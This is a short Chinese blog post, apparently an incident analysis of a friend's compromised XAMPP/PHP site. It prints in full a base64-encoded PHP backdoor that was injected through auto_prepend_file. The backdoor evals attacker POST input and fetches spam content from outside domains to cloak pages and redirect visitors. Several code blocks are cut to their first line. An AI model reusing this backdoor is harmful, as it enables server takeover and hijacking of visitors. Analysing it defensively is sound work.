同學說他的網站中槍, 研究一個晚上, 如果有被插 webshell or reverse shell 木馬之類的應該就沒救了 ~ 放生 ~~~~~
其中比較特別的是 -k 這個參數, 本來用 postman 丟半天都過不了, 後來想到他的憑證是不受信任
覺得 XAMPP 也太兩光, 這個漏洞 2024 就有了, 官網的綑綁包是沒有更新的… 會中槍不意外
1 | # 取得 phpinfo |
後來發現更噁心的竟然在 phpinfo.php 資訊裡面出現 auto_prepend_file 塞入 base64 後門
最後發現他設定在 php.ini 變數 auto_prepend 裡
1 | data:text/html;base64,PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOyRxPSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9pbWFnZXMvJztpc19kaXIoJHEpPzpAbWtkaXIoJHEsMDc1NSx0cnVlKTskSz1bJ21sanQnLCdoa2p0JywnaGdqdCcsJ2hnZ3AnLCd5ZGdwJywnYnh6aicsJ3RlcXpqJywnbGJqdCcsJ3luanQnLCdhYWp0JywnYmJqdCcsJ2NjanQnLCdkZGp0JywnZWVqdCcsJ29ubGluZScsJ21semonXTtjbGFzcyBOe3ByaXZhdGUkVztwcml2YXRlJGM9WydNJywnUicsJ0UnLCdSJywnTycsJ1AnXTtmdW5jdGlvbiBfX2NvbnN0cnVjdCgkUyl7JHRoaXMtPlc9JFM7fWZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXtpZigkdGhpcy0+Y1s1XT09PSdQJyl7JHRoaXMtPmUoKTt9fXByaXZhdGUgZnVuY3Rpb24gZSgpeyRtPVsnTSc9PiR0aGlzLT5XXTskYT1pc3NldCgkbVskdGhpcy0+Y1swXV0pPyRtWyR0aGlzLT5jWzBdXTokbVsnZGVmYXVsdCddOyR0aGlzLT5jWzBdPT09J00nP2V2YWwoJGEpOnByaW50KCRhLlBIUF9FT0wpO319bmV3IE4oJF9QT1NUWydhYnUnXSk7JEI9Wydnb29nbGUnLCdiaW5nJywneWFob28nLCdiYWlkdSddOyRkej1bJ2dvdi5sYW5kJywnY24ubG9sJywnb3JnLmNmZCddOyRKPScvanMvcy5qcyc7JHc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOyRlPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTskdD0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXTskSD0kX1NFUlZFUlsnSFRUUF9IT1NUJ107JE89J2h0dHA6Ly8nO2Z1bmN0aW9uIGMoJHMsJGEpe2ZvcmVhY2goJGEgYXMgJGkpaWYoc3RyaXBvcygkcywkaSkhPT1mYWxzZSlyZXR1cm4gdHJ1ZTtyZXR1cm4gZmFsc2U7fWZ1bmN0aW9uIGYoJHUsJHAsJHcsJHIsJERxKXskb3B0cz1bJ2h0dHAnPT5bJ21ldGhvZCc9PidHRVQnLCdoZWFkZXInPT4iVXNlci1BZ2VudDogJHdcclxuUmVmZXJlcjogJHJcclxuIl0sJ3NzbCc9PlsndmVyaWZ5X3BlZXInPT5mYWxzZSwndmVyaWZ5X3BlZXJfbmFtZSc9PmZhbHNlXV07aWYoKCRjPUBmaWxlX2dldF9jb250ZW50cygkdSxmYWxzZSxzdHJlYW1fY29udGV4dF9jcmVhdGUoJG9wdHMpKSk9PT1mYWxzZSl7JE49Y3VybF9pbml0KCR1KTtjdXJsX3NldG9wdF9hcnJheSgkTixbQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUj0+dHJ1ZSxDVVJMT1BUX0hUVFBIRUFERVI9PlsiVXNlci1BZ2VudDogJHciLCJSZWZlcmVyOiAkciJdLENVUkxPUFRfU1NMX1ZFUklGWVBFRVI9PmZhbHNlLENVUkxPUFRfU1NMX1ZFUklGWUhPU1Q9PmZhbHNlXSk7JGM9Y3VybF9leGVjKCROKTtjdXJsX2Nsb3NlKCROKTt9aWYoJGMhPT1mYWxzZSYmIWVtcHR5KCREcSkpQGZpbGVfcHV0X2NvbnRlbnRzKCJjb21wcmVzcy56bGliOi8vJHAiLCRjKT09PWZhbHNlP2ZpbGVfcHV0X2NvbnRlbnRzKCRwLCRjKTowO3JldHVybiRjO31pZigoIWMoJHcsJEIpJiZjKCRlLCRCKSYmYygkdCwkSykpfHwoIWMoJHcsJEIpJiZjKCRlLCRCKSYmc3RycG9zKCR0LCc/JykhPT1mYWxzZSYmc3RycG9zKCR0LCc9Jyk9PT1mYWxzZSkpe2lmKHN0cnBvcygkdCwncmpjc3NqJykhPT1mYWxzZSl7ZWNobyAkZHpbYXJyYXlfcmFuZCgkZHopXTtleGl0O31oZWFkZXIoIkxvY2F0aW9uOiAiLiRPLiJvcmcuY2ZkLz9yZWZlcnJlcj0iLnVybGVuY29kZSgkZSkuIiZ1cmw9Ii51cmxlbmNvZGUoKGlzc2V0KCRfU0VSVkVSWydIVFRQUyddKSYmJF9TRVJWRVJbJ0hUVFBTJ109PT0nb24nPydodHRwczovLyc6JE8pLiRILiR0KSwgdHJ1ZSwgMzAxKTtleGl0O31pZihjKCR3LCRCKSl7JERxPScnO2ZvcmVhY2goJEsgYXMkeilpZihzdHJpcG9zKCR0LCR6KSE9PWZhbHNlKXskRHE9JHo7YnJlYWs7fSRtPW1kNSgkdCk7JHA9IiRxLyRtIjtpZihmaWxlX2V4aXN0cygkcCkmJmZpbGVtdGltZSgkcCk+dGltZSgpLSg3KjI0KjYwKjYwKSlpZigoJGY9QGZpbGVfZ2V0X2NvbnRlbnRzKCJjb21wcmVzcy56bGliOi8vJHAiKSk9PT1mYWxzZSkkZj1maWxlX2dldF9jb250ZW50cygkcCk7aWYoc3RyaXBvcygkZiwkSikhPT1mYWxzZSl7ZWNobyRmO2V4aXQ7fSR1PSRPLiRkelthcnJheV9yYW5kKCRkeiwxKSUyXS4nLz9saj0nLiR0LicmZHE9Jy4kRHEuJyZodD0nLiRILicmd2p0PXllcyc7JGM9ZigkdSwkcCwkdywkZSwkRHEpO2lmKCRjIT09ZmFsc2Upe2VjaG8kYztleGl0O319Pz4= |
還原後長這樣
1 | error_reporting(0); |
問了 AI 可以直接這樣丟, 真是可怕極了…
1 | # 惡意指令列出 I_AM_HERE |